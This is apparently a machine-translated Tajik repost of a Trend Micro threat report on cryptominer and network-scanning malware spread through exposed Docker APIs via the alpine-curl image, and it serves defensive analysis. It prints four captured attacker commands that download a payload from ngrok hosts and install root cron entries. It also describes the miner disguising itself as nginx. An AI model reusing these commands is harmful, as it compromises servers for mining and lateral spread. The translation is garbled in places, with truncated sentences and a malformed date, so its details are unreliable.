Мо маълумоти ҷамъоваришударо бо истифода аз контейнерҳои асал, ки барои пайгирии таҳдидҳо офаридаем, таҳлил кардем. Ва мо фаъолияти назаррасро аз конканҳои номатлуб ё беиҷозати криптовалютӣ, ки ҳамчун контейнерҳои қаллобӣ бо истифода аз тасвири нашршудаи ҷомеа дар Docker Hub ҷойгир карда шудаанд, муайян кардем. Тасвир ҳамчун як қисми хидмате истифода мешавад, ки конканҳои cryptocurrency зарароварро мерасонад.
Илова бар ин, барномаҳои кор бо шабакаҳо барои ворид шудан ба контейнерҳо ва барномаҳои ҳамсояи кушода насб карда мешаванд.
Мо асалҳои худро тавре мегузорем, ки ҳаст, яъне бо танзимоти пешфарз, бе ягон чораи амниятӣ ё насби минбаъдаи нармафзори иловагӣ. Лутфан қайд кунед, ки Docker барои насби аввал тавсияҳо дорад, то аз хатогиҳо ва осебпазириҳои оддӣ пешгирӣ карда шавад. Аммо кӯзаҳои асал истифодашаванда контейнерҳо мебошанд, ки барои ошкор кардани ҳамлаҳо ба платформаи контейнерсозӣ пешбинӣ шудаанд, на барномаҳои дохили контейнер.
Фаъолияти шубҳаноки ошкоршуда низ назаррас аст, зеро он осебпазириро талаб намекунад ва инчунин аз версияи Docker мустақил аст. Ҷустуҷӯи тасвири нодурусти конфигуратсияшуда ва аз ин рӯ кушода, ҳама чизест, ки ҳамлагарон бояд ба бисёр серверҳои кушод сироят кунанд.
API-и пӯшидаи Docker ба корбар имкон медиҳад, ки доираи васеи
Дар тарафи чап усули интиқоли нармафзори зараровар аст. Дар тарафи рост муҳити ҳамлакунанда мавҷуд аст, ки имкон медиҳад дурдасти тасвирҳо паҳн карда шавад.
Тақсим аз рӯи кишвар аз 3762 API-и кушодаи Docker. Дар асоси ҷустуҷӯи Шодан аз 12.02.2019/XNUMX/XNUMX
Вариантҳои занҷири ҳамла ва боркунии боркаш
Фаъолияти бадкасдона на танхо бо ёрии асал ошкор карда шуд. Маълумот аз Шодан нишон медиҳад, ки шумораи API-ҳои фошшудаи Docker (нигаред ба графики дуюм) пас аз таҳқиқи як контейнери нодуруст танзимшуда, ки ҳамчун пул барои ҷойгиркунии нармафзори истихроҷи cryptocurrency Monero истифода мешавад, афзоиш ёфтааст. Дар моҳи октябри соли гузашта (2018, маълумоти ҷорӣ
Баррасии гузоришҳои асал нишон дод, ки истифодаи тасвири контейнер низ бо истифодаи
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Тавре ки шумо мебинед, файлҳои боршуда аз URL-ҳои доимо тағйирёбанда зеркашӣ карда мешаванд. Ин URL-ҳо мӯҳлати кӯтоҳ доранд, аз ин рӯ пас аз гузаштани мӯҳлат борҳоро зеркашӣ кардан мумкин нест.
Ду варианти боркунӣ вуҷуд дорад. Якум як конкани ELF тартибёфта барои Linux аст (бо Coinminer.SH.MALXMR.ATNO муайян карда шудааст), ки ба ҳавзи истихроҷи маъдан пайваст мешавад. Дуюм скрипт (TrojanSpy.SH.ZNETMAP.A) аст, ки барои ба даст овардани асбобҳои муайяни шабакавӣ, ки барои скан кардани диапазонҳои шабака истифода мешаванд ва сипас барои ҷустуҷӯи ҳадафҳои нав пешбинӣ шудаанд.
Скрипти dropper ду тағирёбандаро муқаррар мекунад, ки пас аз он барои ҷойгиркунии cryptocurrency истихроҷ истифода мешаванд. Тағйирёбандаи HOST URL-ро дар он ҷое, ки файлҳои зараровар ҷойгиранд, дар бар мегирад ва тағирёбандаи RIP номи файл (воқеан, хэш)-и конкани ҷойгиршаванда мебошад. Тағйирёбандаи HOST ҳар вақте, ки тағирёбандаи hash тағйир меёбад. Скрипт инчунин кӯшиш мекунад, ки тафтиш кунад, ки ягон конканҳои дигари cryptocurrency дар сервери ҳамла кор намекунанд.
Намунаҳои тағирёбандаҳои HOST ва RIP, инчунин порчаи код барои тафтиш кардани он ки ягон конканҳои дигар кор намекунанд
Пеш аз оғоз кардани конкан, он ба nginx номгузорӣ шудааст. Дигар версияҳои ин скрипт номи конканро ба дигар хидматҳои қонунӣ, ки метавонанд дар муҳити Linux мавҷуд бошанд, иваз мекунанд. Ин одатан барои аз рӯйхати равандҳои иҷрошаванда гузаштан кифоя аст.
Скрипти ҷустуҷӯ низ дорои хусусиятҳо мебошад. Он бо ҳамон хидмати URL барои ҷойгиркунии абзорҳои зарурӣ кор мекунад. Дар байни онҳо дуӣ zmap аст, ки барои скан кардани шабакаҳо ва гирифтани рӯйхати портҳои кушода истифода мешавад. Скрипт инчунин бинарии дигареро бор мекунад, ки барои ҳамкорӣ бо хидматҳои ёфтшуда ва гирифтани баннерҳо аз онҳо барои муайян кардани маълумоти иловагӣ дар бораи хидмати ёфтшуда (масалан, версияи он) истифода мешавад.
Скрипт инчунин баъзе диапазонҳои шабакаро барои скан пешакӣ муайян мекунад, аммо ин аз версияи скрипт вобаста аст. Он инчунин бандарҳои мавриди ҳадафро аз хидматҳо муқаррар мекунад - дар ин ҳолат, Docker - пеш аз анҷом додани скан.
Ҳамин ки ҳадафҳои имконпазир пайдо мешаванд, баннерҳо ба таври худкор аз онҳо хориҷ карда мешаванд. Скрипт инчунин ҳадафҳоро вобаста ба хидматҳо, барномаҳо, ҷузъҳо ё платформаҳои мавриди таваҷҷӯҳ филтр мекунад: Redis, Jenkins, Drupal, MODX,
Вектори ҳамла тасвири Docker мебошад, ки онро дар ду қисмати коди оянда дидан мумкин аст.
Дар боло номгузорӣ ба хидмати қонунӣ аст ва дар поён ин аст, ки чӣ гуна zmap барои скан кардани шабакаҳо истифода мешавад
Дар боло диапазони шабакаҳои пешакӣ муайяншуда, дар поён портҳои мушаххас барои ҷустуҷӯи хидматҳо, аз ҷумла Docker мебошанд.
Скриншот нишон медиҳад, ки тасвири alpine-curl зиёда аз 10 миллион маротиба зеркашӣ карда шудааст
Дар асоси Alpine Linux ва curl, як воситаи самараноки CLI барои интиқоли файлҳо тавассути протоколҳои гуногун, шумо метавонед эҷод кунед
Бояд қайд кард, ки худи ин тасвир (alpine-curl) зараровар нест, аммо тавре ки шумо дар боло мебинед, онро барои иҷрои вазифаҳои зараровар истифода бурдан мумкин аст. Тасвирҳои шабеҳи Docker инчунин метавонанд барои иҷрои амалҳои зараровар истифода шаванд. Мо бо Докер тамос гирифтем ва дар ин масъала бо онҳо кор кардем.
тавсияњои
Ҳодисае, ки дар ин мақола баррасӣ шудааст, зарурати аз аввал ба назар гирифтани бехатариро таъкид мекунад, аз ҷумла тавсияҳои зерин:
- Барои маъмурони система ва таҳиягарон: Ҳамеша танзимоти API-и худро тафтиш кунед, то боварӣ ҳосил кунед, ки ҳама чиз танҳо барои қабули дархостҳо аз сервери мушаххас ё шабакаи дохилӣ танзим шудааст.
- Принсипи камтарин ҳуқуқҳоро риоя кунед: боварӣ ҳосил кунед, ки тасвирҳои контейнер имзо ва тасдиқ карда шудаанд, дастрасӣ ба ҷузъҳои муҳимро маҳдуд кунед (хидмати оғози контейнер) ва рамзгузорӣ ба пайвастҳои шабакавӣ илова кунед.
- Аз паи
тавсияҳо ва механизмҳои амниятро фаъол созанд, масалан.аз Docker ва дарунсохтхусусиятҳои амниятӣ . - Сканкунии автоматии вақти кор ва тасвирҳоро барои гирифтани маълумоти иловагӣ дар бораи равандҳои дар контейнер иҷрошаванда истифода баред (масалан, барои ошкор кардани қаллобӣ ё ҷустуҷӯи осебпазирӣ). Назорати барнома ва мониторинги якпорчагӣ ба пайгирии тағироти ғайримуқаррарӣ дар серверҳо, файлҳо ва минтақаҳои система кӯмак мекунад.
Trendmicro ба дастаҳои DevOps кӯмак мекунад, ки бехатар созанд, зуд паҳн кунанд ва дар ҳама ҷо оғоз кунанд. Trend Micro
Аломатҳои созиш
Хешҳои марбут:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Дар бораи он
Манбаъ: will.com